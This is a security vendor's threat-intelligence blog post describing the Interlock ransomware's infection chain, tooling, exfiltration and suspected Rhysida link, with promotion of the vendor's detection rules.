Interlock Ransomware Detection: High-Profile and Double-Extortion Attacks Using a New Ransomware Variant

Adversaries employ new Interlock ransomware in recently observed big-game hunting and double-extortion attacks against U.S. and European organizations in multiple industry sectors. Defenders assume with low confidence that Interlock ransomware might be a newly diversified group linked to the Rhysida ransomware affiliates or developers, based on comparable TTPs and encryptor binaries.

Detect Interlock Ransomware

Ransomware attacks continue to increase, nearly doubling from 2022 to 2023, and the trend persists as new ransomware operators emerge. The rise of the new Interlock ransomware variant, targeting organizations globally in an array of industry sectors, including healthcare and government, urges cyber defenders to find innovative strategies to combat emerging ransomware threats.

SOC Prime Platform for collective cyber defense equips security teams with relevant detection algorithms aligned with MITRE ATT&CK®, enriched with tailored CTI and relevant metadata, and compatible with 30+ SIEM, EDR, and Data Lake platforms. Click the Explore Detections button to get to the dedicated Sigma rules for Interlock ransomware detection.

Explore Detections

To get more detections for proactive cyber defense against emerging ransomware attacks, click the following link. 

Interlock Ransomware Attack Analysis

An emerging ransomware variant dubbed Interlock first appeared in the cyber threat arena in September 2024. Ransomware operators behind it have been launching high-profile and double-extortion attacks against global organizations in diverse business verticals, including healthcare, technology, and the public sector in the U.S., as well as manufacturing in Europe. Notably, Interlock ransomware maintainers operate a data leak site, “Worldwide Secrets Blog,” where they post victims’ leaked data, offer victim support chat, and list the email “interlock@2mail[.]co”. Interlock establishes a C2 connection through a scheduled task over an anonymized network, enhancing its stealth and complexity. Adversaries claim to exploit unpatched vulnerabilities in organizations’ infrastructure, citing a dual motivation of financial gain and holding companies accountable for inadequate cybersecurity.

According to the Cisco Talos’ investigation into the Interlock ransomware attacks, adversaries remained in the compromised environment for around 17 days, from the initial breach to the deployment and execution of the ransomware encryptor binary. Notably, Interlock ransomware has both Windows Portable Executable (EXE) and Linux executable (ELF) versions, suggesting the attacker is targeting machines running both Windows and Linux.

The infection chain starts with gaining adversary access to the targeted system through a fake Google Chrome updater executable, which the victim is lured into downloading from a compromised legitimate news site. When clicked, the fake updater is downloaded onto the compromised device from a second weaponized URL belonging to a legitimate retailer.

Adversaries leverage several components in the delivery chain, including a RAT disguised as a fake browser updater, PowerShell scripts, a Golang-based credential stealer, and a keylogger before deploying the Interlock ransomware. They primarily use RDP for lateral movement within the victim’s network, along with tools like AnyDesk and PuTTY. Additionally, they apply Azure Storage Explorer and AZCopy to exfiltrate data to an attacker-controlled Azure storage blob.

Hackers deploy the Interlock ransomware encryptor masquerading it as a legitimate file. When executed, it encrypted targeted files with the “.Interlock” extension and placed a ransom note in each affected folder. The ransom note warns against file recovery attempts or rebooting the systems, demanding a response within 96 hours under threat of leaking the data and notifying the media, risking financial and reputational damage.

Notably, Talos researchers assess with low confidence that Interlock ransomware is a new group emerging from Rhysida operators, based on similarities in adversary TTPs and ransomware behaviors. In addition, researchers observed code overlaps between the binaries of Interlock and Rhysida, particularly in the hardcoded exclusion lists for Windows variants. 

With the increasing threat of double-extortion Interlock ransomware attacks, organizations are striving to elevate their cyber defenses to prevent data breaches. SOC Prime’s complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection serves as a future-proof solution to minimize the risks of ransomware attacks and emerging cyber threats of any sophistication.